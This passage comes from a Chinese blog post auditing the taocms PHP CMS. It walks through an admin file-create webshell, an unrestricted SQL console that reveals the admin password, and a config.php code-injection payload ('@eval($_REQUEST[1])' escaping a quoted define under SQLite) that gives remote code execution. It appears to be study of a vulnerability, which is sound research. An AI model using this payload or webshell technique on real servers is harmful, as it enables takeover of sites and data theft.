		<span class="token class-name static-context">Base</span><span class="token operator">::</span><span class="token function">showmessage</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'新建'</span><span class="token operator">.</span><span class="token variable">$str</span><span class="token operator">.</span><span class="token string single-quoted-string">'成功'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'admin.php?action=file&amp;ctrl=lists&amp;path='</span><span class="token operator">.</span><span class="token variable">$info</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'dirname'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>大致看一遍会发现，对于建立的文件没有任何限制，所以就新建 <code>ice.php</code>然后写入：</p>
<img src="/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/ice.png" class title="新建文件">

<p>然后用菜刀之类的工具，URL填的就是<code><a target="_blank" rel="noopener" href="http://taocms/ice.php">http://taocms/ice.php</a></code>,密码填 cmd ，ok，连上。<br>如果直接访问<code><a target="_blank" rel="noopener" href="http://taocms/ice.php">http://taocms/ice.php</a></code>其实什么也看不到，稍微修改一下<code>ice.php</code>里面写入的内容就可以实现其他的操作了。<br><br></p>
<p>有趣的是，由于这个cms里面管理员后台可以对所有文件进行查看和编辑，所以前面那个对于文件上传的白名单完全可以被修改，也不用费力气去找其他突破点。LOL。<br><br></p>
<hr>
<hr>
<h2 id="SQL"><a href="#SQL" class="headerlink" title="SQL"></a>SQL</h2><p>有一个执行SQL，所以去看看</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token comment">//sql.php部分</span>
<span class="token keyword">function</span> <span class="token function-definition function">excute</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
		<span class="token variable">$creatTable</span><span class="token operator">=</span><span class="token class-name static-context">Base</span><span class="token operator">::</span><span class="token function">magic2word</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'sqltext'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//传入的SQL语句作为sqltext的值&lt;</span>
		<span class="token variable">$db</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">Dbclass</span><span class="token punctuation">(</span><span class="token constant">SYS_ROOT</span><span class="token operator">.</span><span class="token constant">DB_NAME</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//创建新db类</span>
		<span class="token variable">$o</span><span class="token operator">=</span><span class="token variable">$db</span><span class="token operator">-></span><span class="token function">query</span><span class="token punctuation">(</span><span class="token variable">$creatTable</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//用query执行传入的SQL语句&lt;</span>
		<span class="token keyword">echo</span><span class="token string single-quoted-string">'&lt;pre>'</span><span class="token punctuation">;</span>
		<span class="token function">print_r</span><span class="token punctuation">(</span><span class="token variable">$db</span><span class="token operator">-></span><span class="token function">fetch_array</span><span class="token punctuation">(</span><span class="token variable">$o</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token class-name static-context">Base</span><span class="token operator">::</span><span class="token function">execmsg</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'执行SQL'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'?action=sql&amp;ctrl=display'</span><span class="token punctuation">,</span><span class="token variable">$o</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//execmsg()只负责报信</span>
	<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>一样的，对所执行的SQL语句没有什么限制。</p>
<h4 id="TEST"><a href="#TEST" class="headerlink" title="TEST"></a>TEST</h4><ul>
<li>1.<code>show tables;</code><img src="/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/showtables.png" class title="SQL1"></li>
</ul>
<p>可以得知：<br>1.database name &#x3D; <code>taocms</code><br>2.表名是<code>cms_admin</code></p>
<ul>
<li>2.<code>select * from cms_admin;</code><img src="/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/showcolumns.png" class title="SQL2">
这里有趣的是，在 用户修改 这个模块里看不到的管理员密码就这么找到了。要说有什么用，目前我也没看出来。<p></p><hr></li>
</ul>
<p>有个添加用户的，也许会有越权？</p>
<hr>
<hr>

<h2 id="Config"><a href="#Config" class="headerlink" title="Config"></a>Config</h2><p>如果搞过一点类似cms或者blog的搭建，都会知道config这个名字意味着这个文档是关于整个system的配置。</p>
<p>as you can see:</p>
<img src="/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F.png" class title="管理系统">

<p>对于config一类文档，考虑的问题在于：</p>
<ul>
<li><table><tr><td bgcolor="yellow">是否可以写入</td></tr></table>
</li>
<li><table><tr><td bgcolor="yellow">是否可以访问</td></tr></table></li>
</ul>
<hr>
<h2 id="update"><a href="#update" class="headerlink" title="update()"></a>update()</h2><p>查看<code>config.php</code><br>里面有三个function，第三个看起来就是毫无利用价值的，第一个太复杂，先说第二个<code>update()</code>。</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">function update()&#123;
        //这行代码检查`config.php`文件是否可写。如果不可写，它将显示一条消息，指出没有修改配置文件的权限。
		is_writable(SYS_ROOT.'config.php')||Base::showmessage('无权限修改配置文件');

        //这行代码从`$_POST`数组中移除`Submit`、`ctrl`和`action`键，这可能是为了确保这些键不会被写入配置文件。
		unset($_POST['Submit']);unset($_POST['ctrl']);unset($_POST['action']);
        
        //接下来的几行代码创建一个新的配置文件内容。它遍历`$_POST`数组中的每个键值对，并为每个键创建一个定义语句。这些定义语句将被写入配置文件。$key是键。$configs是键值，然后用Base::safeword对$config进行安全检查
		$configData="<span class="token php language-php"><span class="token delimiter important">&lt;?</span>php\r\n<span class="token string double-quoted-string">";
		foreach(<span class="token interpolation"><span class="token variable">$_POST</span></span> as <span class="token interpolation"><span class="token variable">$key</span></span>=><span class="token interpolation"><span class="token variable">$configs</span></span>)&#123;
			<span class="token interpolation"><span class="token variable">$configData</span></span>.="</span><span class="token function">define</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'".$key."'</span><span class="token punctuation">,</span>	<span class="token string single-quoted-string">'".Base::safeword($configs)."'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>\r\n<span class="token string double-quoted-string">";
		&#125;
		<span class="token interpolation"><span class="token variable">$configData</span></span>.="</span><span class="token delimiter important">?></span></span>";

        //将新的配置文件内容写入`config.php`文件。
		$status=file_put_contents(SYS_ROOT."config.php",$configData);
		Base::execmsg("保存设置","?action=".$this->table.'&amp;ctrl=display',TRUE);
	&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>


<br>

<p>不用特别仔细看就可以从<code>unset()</code>这里知道参数以 <strong>POST</strong> 方法传入。以及这个文件可以写入，不过是有条件的写入。以及得到了传入的$_POST的值的$configs自带<code>&lt;?php</code> 和 <code>?&gt;</code>，指明构造PHP version的payload。<br><br></p>
<p>由第三个注释知道，重点在于<code>foreach()</code>中，然后就是<code>Base::safeword()</code>如何进行检查？</p>
<hr>
<h2 id="safeword"><a href="#safeword" class="headerlink" title="safeword()"></a>safeword()</h2><pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token comment">//Base.php</span>

	<span class="token keyword">static</span> <span class="token keyword">function</span> <span class="token function-definition function">safeword</span><span class="token punctuation">(</span><span class="token variable">$text</span><span class="token punctuation">,</span><span class="token variable">$level</span><span class="token operator">=</span><span class="token number">8</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token comment">//是否为数组</span>
		<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">is_array</span><span class="token punctuation">(</span><span class="token variable">$text</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
		<span class="token punctuation">&#123;</span>
			<span class="token comment">//键为$key，键值为$value</span>
            <span class="token keyword">foreach</span><span class="token punctuation">(</span> <span class="token variable">$text</span> <span class="token keyword">as</span> <span class="token variable">$key</span><span class="token operator">=></span><span class="token variable">$value</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
                <span class="token comment">//结果存入$safeword，这也是一个数组。</span>
				<span class="token variable">$safeword</span><span class="token punctuation">[</span><span class="token variable">$key</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token keyword static-context">self</span><span class="token operator">::</span><span class="token function">safeword</span><span class="token punctuation">(</span><span class="token variable">$value</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
			<span class="token punctuation">&#125;</span>
		<span class="token punctuation">&#125;</span>
        <span class="token comment">//不是数组进行switch</span>
		<span class="token keyword">else</span>
		<span class="token punctuation">&#123;</span>
			<span class="token keyword">switch</span> <span class="token punctuation">(</span><span class="token variable">$level</span><span class="token punctuation">)</span>
			<span class="token punctuation">&#123;</span>
				<span class="token comment">//不进行处理</span>
                <span class="token keyword">case</span> <span class="token number">0</span><span class="token punctuation">:</span>
					<span class="token variable">$safeword</span><span class="token operator">=</span><span class="token variable">$text</span><span class="token punctuation">;</span>
					<span class="token keyword">break</span><span class="token punctuation">;</span>
                <span class="token comment">//转整数</span>
				<span class="token keyword">case</span> <span class="token number">1</span><span class="token punctuation">:</span>
					<span class="token variable">$safeword</span><span class="token operator">=</span><span class="token function">intval</span><span class="token punctuation">(</span><span class="token variable">$text</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
					<span class="token keyword">break</span><span class="token punctuation">;</span>
                <span class="token comment">//移除所有HTML标签</span>
				<span class="token keyword">case</span> <span class="token number">3</span><span class="token punctuation">:</span>
					<span class="token variable">$safeword</span><span class="token operator">=</span><span class="token function">strip_tags</span><span class="token punctuation">(</span><span class="token variable">$text</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
					<span class="token keyword">break</span><span class="token punctuation">;</span>
                <span class="token comment">//将特殊字符转化为HTML实体，并将换行符转换为&lt;br/>标签</span>
				<span class="token keyword">case</span> <span class="token number">5</span><span class="token punctuation">:</span>
					<span class="token variable">$safeword</span><span class="token operator">=</span><span class="token function">nl2br</span><span class="token punctuation">(</span><span class="token function">htmlspecialchars</span><span class="token punctuation">(</span><span class="token variable">$text</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
					<span class="token keyword">break</span><span class="token punctuation">;</span>
                <span class="token comment">//添加'来转义$text中出现的单引号，移除关键词与符号select, union,=，避免SQL Injection</span>
				<span class="token keyword">case</span> <span class="token number">6</span><span class="token punctuation">:</span>
					<span class="token variable">$safeword</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"'"</span><span class="token punctuation">,</span><span class="token string double-quoted-string">""</span><span class="token punctuation">,</span><span class="token function">addslashes</span><span class="token punctuation">(</span><span class="token variable">$text</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
					<span class="token variable">$safeword</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"select"</span><span class="token punctuation">,</span><span class="token string double-quoted-string">""</span><span class="token punctuation">,</span><span class="token variable">$safeword</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
					<span class="token variable">$safeword</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"union"</span><span class="token punctuation">,</span><span class="token string double-quoted-string">""</span><span class="token punctuation">,</span><span class="token variable">$safeword</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
					<span class="token variable">$safeword</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"="</span><span class="token punctuation">,</span><span class="token string double-quoted-string">""</span><span class="token punctuation">,</span><span class="token variable">$safeword</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
					<span class="token keyword">break</span><span class="token punctuation">;</span>
				<span class="token keyword">default</span><span class="token punctuation">:</span><span class="token comment">//默认level=8时为default</span>

                    <span class="token comment">//如果数据库类型是Sqlite，将$text中出现的单引号都替换为两个单引号。</span>
					<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">ucfirst</span><span class="token punctuation">(</span><span class="token constant">DB</span><span class="token punctuation">)</span><span class="token operator">==</span><span class="token string single-quoted-string">'Sqlite'</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
						<span class="token variable">$safeword</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"'"</span><span class="token punctuation">,</span><span class="token string double-quoted-string">"''"</span><span class="token punctuation">,</span><span class="token variable">$text</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
					<span class="token punctuation">&#125;</span>
                    <span class="token comment">//不是Sqlite，就用_addslashs()来处理$text.该函数静态调用addslashs()函数处理$text</span>
					<span class="token keyword">else</span><span class="token punctuation">&#123;</span>
						<span class="token variable">$safeword</span><span class="token operator">=</span><span class="token class-name static-context">Base</span><span class="token operator">::</span><span class="token function">_addslashs</span><span class="token punctuation">(</span><span class="token variable">$text</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
					<span class="token punctuation">&#125;</span>
					<span class="token keyword">break</span><span class="token punctuation">;</span>
			
			<span class="token punctuation">&#125;</span>
		<span class="token punctuation">&#125;</span>
		<span class="token keyword">return</span> <span class="token variable">$safeword</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<ol>
<li><p><code>addslashes()</code>函数：在PHP中，<code>addslashes()</code>函数的主要作用是在预定义字符前添加反斜线。预定义字符包括单引号(‘)，双引号(“)，反斜线()和NULL。</p>
</li>
<li><p>将特殊字符转化为HTML实体，并将换行符转换为<code>&lt;br/&gt;</code>标签：在PHP中，可以使用<code>htmlentities()</code>函数将字符转换为HTML实体。这样做的目的是防止跨站脚本攻击（XSS），并确保文本在HTML文档中正确显示。例如，如果你的文本中包含<code>&lt;</code>或<code>&gt;</code>等字符，它们可能会被浏览器误解为HTML标签。通过将这些字符转换为HTML实体，你可以确保它们会被正确地显示为文本，而不是被解析为HTML代码。同样，<code>nl2br()</code>函数可以将字符串中的换行符转换为HTML的<code>&lt;br/&gt;</code>标签，这样在HTML文档中就可以正确地显示换行了。</p>
</li>
<li><p>将单引号替换为两个单引号：在SQLite中，单引号是字符串的界定符。如果字符串中包含单引号，SQLite可能会将其误解为字符串的结束，从而导致错误。为了避免这种情况，将字符串中的单引号替换为两个单引号。这样，SQLite就会知道这是一个字面上的单引号，而不是字符串的结束。</p>
</li>
</ol>
<br>
<br>

<p>在了解完这些代码在说什么之后，发现除了level 8这个default，其他都有较为严苛的限制。而在default中，有一个if else的限制，<code>Base::_addslashs()</code>不能绕过，就focus on <strong>Sqlite</strong>。</p>
<h2 id="Sqlite"><a href="#Sqlite" class="headerlink" title="Sqlite"></a>Sqlite</h2><p>构造payload：<br><code><code>\</code>';@eval($_REQUEST[1];/*</code></p>
<p>$safeword之后</p>
<p><code>\&#39;&#39;;@eval($_REQUEST[1];/*</code></p>
<p>与<code>congig.php</code>中WEBINFO define的<code>&#39;</code>进行闭合，让PHP代码逃逸进而成功写入。</p>
<p>然后访问<code>http://taocms/config.php?1=phpinfo();</code><br>getshell成功。</p>
<p>最后的<code>/*</code>也可以写成<code>//</code></p>
<hr>
<hr>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/rustymoon/tags/PHP/" rel="tag"># PHP</a>
              <a href="/rustymoon/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag"># 代码审计</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/rustymoon/2023/11/16/Read-How/" rel="prev" title="Read-How">
      <i class="fa fa-chevron-left"></i> Read-How
    </a></div>
      <div class="post-nav-item">
    <a href="/rustymoon/2023/11/20/PHP-SQL-Injection/" rel="next" title="PHP_SQL-Injection">
      PHP_SQL-Injection <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#download-init"><span class="nav-number">1.</span> <span class="nav-text">download &amp; init</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%B7%AF%E7%94%B1%EF%BC%9A"><span class="nav-number">2.</span> <span class="nav-text">路由：</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E5%8F%B0"><span class="nav-number">2.1.</span> <span class="nav-text">前台</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%90%8E%E5%8F%B0"><span class="nav-number">2.2.</span> <span class="nav-text">后台</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Model"><span class="nav-number">3.</span> <span class="nav-text">Model&#x2F;</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD"><span class="nav-number">3.1.</span> <span class="nav-text">任意文件下载</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="nav-number">3.2.</span> <span class="nav-text">任意文件上传</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#upload%EF%BC%9F"><span class="nav-number">3.2.1.</span> <span class="nav-text">upload？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#create%EF%BC%9F"><span class="nav-number">3.2.2.</span> <span class="nav-text">create？</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL"><span class="nav-number">3.3.</span> <span class="nav-text">SQL</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#TEST"><span class="nav-number">3.3.0.1.</span> <span class="nav-text">TEST</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Config"><span class="nav-number">3.4.</span> <span class="nav-text">Config</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#update"><span class="nav-number">3.5.</span> <span class="nav-text">update()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#safeword"><span class="nav-number">3.6.</span> <span class="nav-text">safeword()</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Sqlite"><span class="nav-number">3.7.</span> <span class="nav-text">Sqlite</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="lueflam"
      src="/rustymoon/images/fa.jpg">
  <p class="site-author-name" itemprop="name">lueflam</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/rustymoon/archives/">
        
          <span class="site-state-item-count">7</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/rustymoon/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lueflam</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="Symbols count total">11k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="Reading time total">10 mins.</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/rustymoon/lib/anime.min.js"></script>
  <script src="/rustymoon/lib/velocity/velocity.min.js"></script>
  <script src="/rustymoon/lib/velocity/velocity.ui.min.js"></script>

<script src="/rustymoon/js/utils.js"></script>

<script src="/rustymoon/js/motion.js"></script>


<script src="/rustymoon/js/schemes/pisces.js"></script>


<script src="/rustymoon/js/next-boot.js"></script>




  




  
<script src="/rustymoon/js/local-search.js"></script>













  

  

</body>
</html>
